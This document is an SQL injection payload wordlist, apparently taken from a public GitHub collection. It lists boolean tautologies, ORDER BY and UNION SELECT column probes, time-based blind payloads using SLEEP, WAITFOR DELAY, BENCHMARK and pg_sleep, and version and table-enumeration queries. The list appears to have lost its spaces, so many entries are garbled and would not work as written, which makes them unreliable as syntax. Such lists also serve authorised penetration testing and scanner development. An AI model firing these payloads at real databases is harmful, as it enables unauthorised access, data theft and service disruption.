#https://github.com/payloadbox/sql-injection-payload-list
AND1
AND0
ANDtrue
ANDfalse
1-false
1-true
1*56
-2
1'ORDERBY1--+
1'ORDERBY1,2,3--+
1'GROUPBY1,2,--+
1'GROUPBY1,2,3--+
'GROUPBYcolumnnameshaving1=1--
-1'UNIONSELECT1,2,3--+
'UNIONSELECTsum(columnname)fromtablename--
-1UNIONSELECT1INTO@,@
-1UNIONSELECT1INTO@,@,@
1AND(SELECT*FROMUsers)=1	
'ANDMID(VERSION(),1,1)='5';
'and1in(selectmin(name)fromsysobjectswherextype='U'andname>'.')--
Findingthetablename
Time-Based:
,(select*from(select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFORDELAY'0:0:30'--
#	Hashcomment
/*	C-stylecomment
---	SQLcomment
;%00	Nullbyte
`	Backtick
OR1=1
OR1=0
ORx=x
ORx=y
OR1=1#
OR1=0#
ORx=x#
ORx=y#
OR1=1--
OR1=0--
ORx=x--
ORx=y--
OR3409=3409AND('pytW'LIKE'pytW
OR3409=3409AND('pytW'LIKE'pytY
HAVING1=1
HAVING1=0
HAVING1=1#
HAVING1=0#
HAVING1=1--
HAVING1=0--
AND1=1
AND1=0
AND1=1--
AND1=0--
AND1=1#
AND1=0#
AND1=1AND'%'='
AND1=0AND'%'='
AND1083=1083AND(1427=1427
AND7506=9091AND(5913=5913
AND1083=1083AND('1427=1427
AND7506=9091AND('5913=5913
AND7300=7300AND'pKlZ'='pKlZ
AND7300=7300AND'pKlZ'='pKlY
AND7300=7300AND('pKlZ'='pKlZ
AND7300=7300AND('pKlZ'='pKlY
ASINJECTXWHERE1=1AND1=1
ASINJECTXWHERE1=1AND1=0
ASINJECTXWHERE1=1AND1=1#
ASINJECTXWHERE1=1AND1=0#
ASINJECTXWHERE1=1AND1=1--
ASINJECTXWHERE1=1AND1=0--
WHERE1=1AND1=1
WHERE1=1AND1=0
WHERE1=1AND1=1#
WHERE1=1AND1=0#
WHERE1=1AND1=1--
WHERE1=1AND1=0--
ORDERBY1--
ORDERBY2--
ORDERBY3--
ORDERBY4--
ORDERBY5--
ORDERBY6--
ORDERBY7--
ORDERBY8--
ORDERBY9--
ORDERBY10--
ORDERBY11--
ORDERBY12--
ORDERBY13--
ORDERBY14--
ORDERBY15--
ORDERBY16--
ORDERBY17--
ORDERBY18--
ORDERBY19--
ORDERBY20--
ORDERBY21--
ORDERBY22--
ORDERBY23--
ORDERBY24--
ORDERBY25--
ORDERBY26--
ORDERBY27--
ORDERBY28--
ORDERBY29--
ORDERBY30--
ORDERBY31337--
ORDERBY1#
ORDERBY2#
ORDERBY3#
ORDERBY4#
ORDERBY5#
ORDERBY6#
ORDERBY7#
ORDERBY8#
ORDERBY9#
ORDERBY10#
ORDERBY11#
ORDERBY12#
ORDERBY13#
ORDERBY14#
ORDERBY15#
ORDERBY16#
ORDERBY17#
ORDERBY18#
ORDERBY19#
ORDERBY20#
ORDERBY21#
ORDERBY22#
ORDERBY23#
ORDERBY24#
ORDERBY25#
ORDERBY26#
ORDERBY27#
ORDERBY28#
ORDERBY29#
ORDERBY30#
ORDERBY31337#
ORDERBY1
ORDERBY2
ORDERBY3
ORDERBY4
ORDERBY5
ORDERBY6
ORDERBY7
ORDERBY8
ORDERBY9
ORDERBY10
ORDERBY11
ORDERBY12
ORDERBY13
ORDERBY14
ORDERBY15
ORDERBY16
ORDERBY17
ORDERBY18
ORDERBY19
ORDERBY20
ORDERBY21
ORDERBY22
ORDERBY23
ORDERBY24
ORDERBY25
ORDERBY26
ORDERBY27
ORDERBY28
ORDERBY29
ORDERBY30
ORDERBY31337
RLIKE(SELECT(CASEWHEN(4346=4346)THEN0x61646d696eELSE0x28END))AND'Txws'='
RLIKE(SELECT(CASEWHEN(4346=4347)THEN0x61646d696eELSE0x28END))AND'Txws'='
%'AND8310=8310AND'%'='
%'AND8310=8311AND'%'='
and(selectsubstring(@@version,1,1))='X'
and(selectsubstring(@@version,1,1))='M'
and(selectsubstring(@@version,2,1))='i'
and(selectsubstring(@@version,2,1))='y'
and(selectsubstring(@@version,3,1))='c'
and(selectsubstring(@@version,3,1))='S'
and(selectsubstring(@@version,3,1))='X'
sleep(5)#
1orsleep(5)#
"orsleep(5)#
'orsleep(5)#
"orsleep(5)="
'orsleep(5)='
1)orsleep(5)#
")orsleep(5)="
')orsleep(5)='
1))orsleep(5)#
"))orsleep(5)="
'))orsleep(5)='
;waitfordelay'0:0:5'--
);waitfordelay'0:0:5'--
';waitfordelay'0:0:5'--
";waitfordelay'0:0:5'--
');waitfordelay'0:0:5'--
");waitfordelay'0:0:5'--
));waitfordelay'0:0:5'--
'));waitfordelay'0:0:5'--
"));waitfordelay'0:0:5'--
benchmark(10000000,MD5(1))#
1orbenchmark(10000000,MD5(1))#
"orbenchmark(10000000,MD5(1))#
'orbenchmark(10000000,MD5(1))#
1)orbenchmark(10000000,MD5(1))#
")orbenchmark(10000000,MD5(1))#
')orbenchmark(10000000,MD5(1))#
1))orbenchmark(10000000,MD5(1))#
"))orbenchmark(10000000,MD5(1))#
'))orbenchmark(10000000,MD5(1))#
pg_sleep(5)--
1orpg_sleep(5)--
"orpg_sleep(5)--
'orpg_sleep(5)--
1)orpg_sleep(5)--
")orpg_sleep(5)--
')orpg_sleep(5)--
1))orpg_sleep(5)--
"))orpg_sleep(5)--
'))orpg_sleep(5)--
AND(SELECT*FROM(SELECT(SLEEP(5)))bAKL)AND'vRxe'='vRxe
AND(SELECT*FROM(SELECT(SLEEP(5)))YjoC)AND'%'='
AND(SELECT*FROM(SELECT(SLEEP(5)))nQIP)
AND(SELECT*FROM(SELECT(SLEEP(5)))nQIP)--
AND(SELECT*FROM(SELECT(SLEEP(5)))nQIP)#
SLEEP(5)#
SLEEP(5)--
SLEEP(5)="
SLEEP(5)='
orSLEEP(5)
orSLEEP(5)#
orSLEEP(5)--
orSLEEP(5)="
orSLEEP(5)='
waitfordelay'00:00:05'
waitfordelay'00:00:05'--
waitfordelay'00:00:05'#
benchmark(50000000,MD5(1))
benchmark(50000000,MD5(1))--
benchmark(50000000,MD5(1))#
orbenchmark(50000000,MD5(1))
orbenchmark(50000000,MD5(1))--
orbenchmark(50000000,MD5(1))#
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
orpg_SLEEP(5)
orpg_SLEEP(5)--
orpg_SLEEP(5)#
'\"
AnDSLEEP(5)
AnDSLEEP(5)--
AnDSLEEP(5)#
&&SLEEP(5)
&&SLEEP(5)--
&&SLEEP(5)#
'AnDSLEEP(5)ANd'1
'&&SLEEP(5)&&'1
ORDERBYSLEEP(5)
ORDERBYSLEEP(5)--
ORDERBYSLEEP(5)#
(SELECT*FROM(SELECT(SLEEP(5)))ecMj)
(SELECT*FROM(SELECT(SLEEP(5)))ecMj)#
(SELECT*FROM(SELECT(SLEEP(5)))ecMj)--
+benchmark(3200,SHA1(1))+'
+SLEEP(10)+'
RANDOMBLOB(500000000/2)
AND2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
OR2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))
RANDOMBLOB(1000000000/2)
AND2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
SLEEP(1)/*'orSLEEP(1)or'"orSLEEP(1)or"*/
ORDERBYSLEEP(5)
ORDERBY1,SLEEP(5)
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A'))
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
ORDERBYSLEEP(5)#
ORDERBY1,SLEEP(5)#
ORDERBY1,SLEEP(5),3#
ORDERBY1,SLEEP(5),3,4#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDERBYSLEEP(5)--
ORDERBY1,SLEEP(5)--
ORDERBY1,SLEEP(5),3--
ORDERBY1,SLEEP(5),3,4--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
ORDERBY1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNIONALLSELECT1
UNIONALLSELECT1,2
UNIONALLSELECT1,2,3
UNIONALLSELECT1,2,3,4
UNIONALLSELECT1,2,3,4,5
UNIONALLSELECT1,2,3,4,5,6
UNIONALLSELECT1,2,3,4,5,6,7
UNIONALLSELECT1,2,3,4,5,6,7,8
UNIONALLSELECT1,2,3,4,5,6,7,8,9
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNIONALLSELECT1#
UNIONALLSELECT1,2#
UNIONALLSELECT1,2,3#
UNIONALLSELECT1,2,3,4#
UNIONALLSELECT1,2,3,4,5#
UNIONALLSELECT1,2,3,4,5,6#
UNIONALLSELECT1,2,3,4,5,6,7#
UNIONALLSELECT1,2,3,4,5,6,7,8#
UNIONALLSELECT1,2,3,4,5,6,7,8,9#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
UNIONALLSELECT1--
UNIONALLSELECT1,2--
UNIONALLSELECT1,2,3--
UNIONALLSELECT1,2,3,4--
UNIONALLSELECT1,2,3,4,5--
UNIONALLSELECT1,2,3,4,5,6--
UNIONALLSELECT1,2,3,4,5,6,7--
UNIONALLSELECT1,2,3,4,5,6,7,8--
UNIONALLSELECT1,2,3,4,5,6,7,8,9--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--
UNIONALLSELECT1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
UNIONSELECT@@VERSION,SLEEP(5),3
UNIONSELECT@@VERSION,SLEEP(5),USER(),4
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
UNIONSELECT@@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
UNIONSELECT@@VERSION,SLEEP(5),"'3
UNIONSELECT@@VERSION,SLEEP(5),"'3'"#
